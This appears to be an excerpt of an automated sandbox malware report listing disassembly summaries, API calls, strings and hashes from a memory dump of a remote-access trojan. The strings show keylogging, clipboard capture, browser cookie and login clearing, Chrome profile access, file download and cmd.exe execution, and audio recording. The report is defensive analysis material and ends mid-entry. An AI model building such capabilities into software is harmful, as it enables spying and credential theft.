                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExecuteShell
                                                                  • String ID: /C $cmd.exe$open
                                                                  • API String ID: 587946157-3896048727
                                                                  • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                  • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                  • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                  • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                  APIs
                                                                  • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                  • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 3123878439-4028850238
                                                                  • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                  • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                  • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                  • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetCursorInfo$User32.dll
                                                                  • API String ID: 1646373207-2714051624
                                                                  • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                  • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                  • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                  • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                  • API String ID: 2574300362-1519888992
                                                                  • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                  • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                  • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                  • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                  • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                  • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                  • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                  • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                  • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                  • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                  APIs
                                                                  Strings
                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                  • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                  • API String ID: 3472027048-1236744412
                                                                  • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                  • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                  • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                  • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                  APIs
                                                                    • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                                    • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                    • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C594
                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                  • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                  • String ID: [ $ ]
                                                                  • API String ID: 3309952895-93608704
                                                                  • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                  • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                  • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                  • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                  • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                  • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                  • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                  • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                  • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                  • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                  • String ID:
                                                                  • API String ID: 3919263394-0
                                                                  • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                  • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                  • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                  • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 39102293-0
                                                                  • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                  • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                  • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                  • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                    • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                  • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                  • String ID:
                                                                  • API String ID: 2633735394-0
                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                  • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                  • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193F0
                                                                  • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193F6
                                                                  • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193FC
                                                                  • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 00419402
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 4116985748-0
                                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                  • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                  • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                  APIs
                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                    • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                  • String ID:
                                                                  • API String ID: 1761009282-0
                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                  • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                  • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                  • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                  • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                  • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                  APIs
                                                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                  • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer__onexit
                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                  • API String ID: 1881088180-3686566968
                                                                  • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                                                  • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                  • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                                                  • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                  APIs
                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 0-711371036
                                                                  • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                  • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                  • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                  • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                  Strings
                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                  • API String ID: 481472006-1507639952
                                                                  • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                                                  • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                  • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                                                  • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                  APIs
                                                                  • Sleep.KERNEL32 ref: 00416640
                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DownloadFileSleep
                                                                  • String ID: !D@
                                                                  • API String ID: 1931167962-604454484
                                                                  • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                                  • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                  • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                                  • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                  • API String ID: 481472006-2430845779
                                                                  • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                                  • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                  • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                                  • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: alarm.wav$hYG
                                                                  • API String ID: 1174141254-2782910960
                                                                  • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                                  • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                  • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                                  • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                  APIs
                                                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                  • String ID: Online Keylogger Stopped
                                                                  • API String ID: 1623830855-1496645233
                                                                  • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                                                  • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                  • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                                                  • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                  APIs
                                                                  • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                                  • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: wave$BufferHeaderPrepare
                                                                  • String ID: XMG
                                                                  • API String ID: 2315374483-813777761
                                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                  APIs
                                                                  • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocaleValid
                                                                  • String ID: IsValidLocaleName$JD
                                                                  • API String ID: 1901932003-2234456777
                                                                  • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                  • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                  • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                  • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                  • API String ID: 1174141254-4188645398
                                                                  • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                  • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                  • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                  • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                  Strings
                                                                  Memory Dump Source
